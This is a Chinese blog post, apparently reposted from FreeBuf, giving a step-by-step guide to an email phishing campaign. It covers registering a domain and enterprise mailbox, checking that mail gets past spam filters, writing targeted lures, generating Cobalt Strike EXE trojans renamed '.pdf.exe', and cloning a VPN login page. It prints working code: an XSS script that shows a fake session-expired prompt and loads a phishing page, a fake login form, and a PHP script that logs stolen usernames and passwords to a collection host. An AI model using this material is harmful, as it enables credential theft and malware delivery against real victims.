邮箱钓鱼的“鸡”和“蛋” – 作者:zoro123

图片[1]-邮箱钓鱼的“鸡”和“蛋” – 作者:zoro123-安全小百科

钓鱼这个话题在圈内近来越来越热,什么web打点、什么0day攻击都不如钓鱼直接撸内网。钓鱼者秉持的宗旨:“愿者上钩”。但是实际社工钓鱼中可不能纯靠运气,信息搜集至关重要!选择什么样的“鱼儿”?“鱼儿”喜欢什么样的“诱饵”?“鱼儿”处于什么样的位置?等等等等……最后才是“愿者上钩”,美美的当一把姜太公。当然所有一切的前提是你得有高大上的邮箱、华丽的域名以及精美的文案(注:别忘了附件或者钓鱼链接)。

接下来我们从购买域名—>搭建邮箱—->测试邮箱—->设计文案—–>制作“诱饵”—->甩鱼钩—>“愿者上钩”这几个步骤来华丽的描述一下钓鱼的整体过程:

0x00 获取域名

首先我们肯定得注册一个域名平台的账号,这里推荐国内阿里云、腾讯云、百度云。。。。。我这里的示范以阿里云为例。通过注册的账号登录阿里云平台,找到域名模块。

1609040815_5fe803af69a6136f135f9.png!small?1609040814937选择域名注册模块,根据自己的喜好需求购买的域名即可:

1609040825_5fe803b9563c303920b79.png!small?1609040824975

钱包决定一切

1609040830_5fe803bec60b9a44f6180.png!small?1609040830257

1609040836_5fe803c4b8b46941e37ea.png!small?1609040836264

购买成功后在次访问域名列表会看到你刚才购买的域名,并且可以通过后面的提示进行先关设置,至此我们已经获取到了一个自己的域名:

1609040845_5fe803cd2a9add8f813b1.png!small?1609040844606

0x01 开通邮箱

大佬之前说过可以使用白嫖的免费企业邮箱,可是呢?现在好像是停用了。。。没办法白嫖可是真的难受,只能硬着头皮买个最便宜的企业邮。。。

阿里云控制台选择企业邮箱,根据自己钱包大小和需求购买合适的企业邮箱使用权限:

1609040870_5fe803e610e2f58ab3a1c.png!small?1609040869490

1609040878_5fe803ee4f8986cd2b0db.png!small?1609040877798

1609040900_5fe80404b8fb429c43d60.png!small?1609040900199

购买成功后在邮箱列表可以看到自己购买的企业邮箱

1609040907_5fe8040b21580e7fadd22.png!small?1609040906677

1609040913_5fe8041191edbb7881766.png!small?1609040913026

最后就可以利用阿里企业邮箱去登录我们申请好的企业邮箱,根据需求新建不同账号等即可:

1609040970_5fe8044ad4e0b21f99ebd.png!small?1609040970420

0x02 测试邮箱

利用该邮箱向其他企业邮箱或者常用社交邮箱发送测试信息,查看是否会被拦截或者丢弃掉垃圾邮箱。

1609040977_5fe804518480f93434d82.png!small?1609040977018

测试可以正常接收,未被丢弃到垃圾邮箱。(注:如果被加入到垃圾邮箱可以通过添加SPF解决)

1609040982_5fe80456b9140aa64629a.png!small?1609040982255

发现一个有趣的事,如果邮件中存在测试的字眼就会被接收邮箱放到垃圾邮件中:

1609040989_5fe8045d8d99b4c3c72b2.png!small?1609040989112

0x03 文案设计

自我总结了2种针对性的文案设计,第一种是针对个人的钓鱼,第二种是针对群体的钓鱼。

就个人而言,需要从他的喜好、习惯、职位等方面进行文案拟定,针对性进行”诱饵“的制作。例如:通过调查某公司运维刘某是一个游戏爱好者,并且花钱特别抠。通过这些已知的人物特征制定针对性的钓鱼文案,以及针对性的诱饵(1、游戏装备低价购买链接获取他的社交软件。2、游戏攻略exe木马或者word宏病毒获取其个人机权限等)

1609041014_5fe8047653de9c0a96894.png!small?1609041013918

针对群体而言,可以发送一些官方的放假通知,危害重大的漏洞整改,新上线系统部署等一些方式制定钓鱼文案,以广撒网的方式获取部分安全意识薄弱人员的相关信息。

1609041020_5fe8047c1f857dda99030.png!small?1609041019575

0x04 “诱饵”制作

“诱饵”一般根据现实情况去制作,主要分为2大类:一种是exe类型的点击木马,受害者通过主动点击文件造成被上线或者被获取敏感信息;另一种是伪造界面,受害者通过主动访问伪造页面输入用户名密码等敏感信息导致被泄漏。

(1)利用cobalt strike制作exe木马文件:

通过attacks–>packages–>windows Executable选择设置好的监听,生成EXE木马文件。

1609041030_5fe80486e9e7e42d2fa7d.png!small?1609041030566

一般选择x64位的负载:

1609041037_5fe8048d03d251d651b48.png!small?1609041036500

修改木马文件的后缀为“.pdf.exe”,并尽量加长文件名。

1609041050_5fe8049ac3118e5e7c061.png!small?1609041050266

通过用户点击,对方个人机上线。

1609041057_5fe804a13aa79bd488a77.png!small?1609041056720

(2)利用已知应用系统进行伪造钓鱼页面:

爬取某公司VPN静态界面,这里我们以常见的某服VPN为例,制作效果图如下:

1609041119_5fe804df9e2a9528b62d3.png!small?1609041119077

1609041144_5fe804f81342be4656ec3.png!small?1609041143536

1、利用图片探针获取访问者IP地址、浏览器等信息

1609041153_5fe8050133861797967b6.png!small?1609041152656

.htaccess文件内容如下:

1609041159_5fe8050764ba2c6014a63.png!small?1609041158843

info.php实现起来比较简单,就是通过http请求头来获取当前IP地址、UA等信息并记录到日志文件当中。

1609041185_5fe80521e7c704bcf3e41.png!small?1609041185376

1609041245_5fe8055d6279f8dfee681.png!small?1609041244928

1609041251_5fe80563d5f1637fa0c5c.png!small?1609041251350

一切准备就绪,访问搭建好的伪造网站,等待受害者访问即可获取访问者的IP地址、UA、操作系统、浏览器等信息

1609041450_5fe8062a4b0335332856f.png!small?1609041449819

2、利用XSS获取登录用户名密码

代码文件如下:

1609041465_5fe8063963288ab712eb5.png!small?1609041464880

代码量很小,我在这里直接贴出来

//admin_login.html 本来的管理员登录页面

<html>
<body>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>管理员登录</title></head>
<form method="post" action="http://xxx/x.xx">
用户名:<br>
<input type="text" name="username">
<br>
密码:<br>
<input type="text" name="password">
<br><br>
<input type="submit" value="登录">
</form> 
</body>
</html>

//admin_index.html 原本的管理后台页面


<html>
<body>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>管理员后台</title></head>
<h1>这里是管理员后台,你已成功登录</h1>
<button type="button">一键日卫星</button>
<hr><b>最新留言</b>
<ul>
<li>Zoro好帅</li>
<li>楼上说得对</li>
<script src= "xss.js"></script> </ul> </body> </html>

//fish.html 我们仿的登录页面,也就是钓鱼页

<body>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>管理员登录</title></head>
<form method="post" action="http://getpasswd/get.php">//这里发送给接收程序
用户名:<br>
<input type="text" name="username">
<br>
密码:<br>
<input type="text" name="password">
<br><br>
<input type="submit" value="Submit">
</form> 
</body>
</html>

//get.php 数据接收文件

<?php
$date ='日期:'. date("[Y-m-d H:i:s]")."\r\n";
$line = '----------------------------------'."\r\n";
$user = '账号:'.$_POST['username']."\r\n";
$pwd = '密码:'.$_POST['password']."\r\n";
$ip = 'IP:'.getenv('REMOTE_ADDR')."\r\n";
$url = '钓鱼模板:'.getenv('HTTP_REFERER')."\r\n";
$log = "------------------------------\n\n\n\n";
$result = $date.$line.$url.$user.$pwd.$ip.$log;
file_put_contents('fish.log',$result, FILE_APPEND);
header("Location: http://getpasswd:5100/admin_index.html");
?>

//xxs.js 触发弹窗,跳转至伪造登录界面

setTimeout(function() {
    alert("登陆过期,请重新登陆!");
    parent.document.writeln("<iframe style=\"margin:0px;padding:0px;height:100%;width:100%;\" src = \"http://getpasswd/fish.html\" frameBorder=0 scrolling=no></iframe>");
    setTimeout(function() {
        document.getElementsByTagName("body")[0].setAttribute("style", "margin: 2px;");
    },
    100);
    setTimeout(function() {
        parent.document.getElementsByTagName("body")[0].setAttribute("style", "margin: 0px;");
    },
    100);
},
10);

以下演示我们的伪造界面抓取密码的流程,当受害者直接访问伪造的管理员后台,过一段时间会发现登录超时的提示,此时证明已经成功加载我们的xss.js代码(注:此处xss.js的代码触发时间可以自行修改,我为了方便修改为10s,真实环境建议设置较长):

1609042055_5fe80887c4af465fb61bb.png!small?1609042055253

1609042152_5fe808e8c34d531ce4e0d.png!small?1609042152229

点击确认页面发生跳转至我们提前伪造好的登录界面,接着会触发放置好的get.php文件并调用获取我们的用户名密码:

1609042164_5fe808f4d0feeefe16485.png!small?1609042164282

执行登录操作后又会跳转至我们伪造的后台界面(实际情况中可以将本地跳转指定到正确的登录界面)

1609042172_5fe808fce5121c7b2af9f.png!small?1609042172393

从本地日志中我们可以看到受害者输入的用户名密码:

1609042178_5fe80902d42390ba15619.png!small?1609042178380

0x04 甩“鱼钩”

下面简单介绍几个钓鱼案例:

案例一:伪造游戏礼包领取链接(获取用户名密码)

1609042191_5fe8090fdb777ab6de673.png!small?1609042191301

案例二:伪造新上线系统部署(VPN、OA等其他系统的账号密码获取等)

1609042204_5fe8091c52a7e2f1a771d.png!small?1609042204158

案例三:以内部公司的名义发送漏洞整改通告并附上检测工具(工具为恶意木马可执行上线操作)

1609042224_5fe809309ddb5ea4d96eb.png!small?1609042224072

案例四:以相关部门名义发布整改通告(通过恶意链接获取用户名密码等其他敏感信息)

1609042238_5fe8093ed8d49e6dbc1f1.png!small?1609042238517

0x06  愿者“上钩”

啥也不说了,就等着,美美的当一把姜太公……

1609042252_5fe8094c0464feee4af31.png!small?1609042251411

来源:freebuf.com 2020-12-27 12:18:01 by: zoro123

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论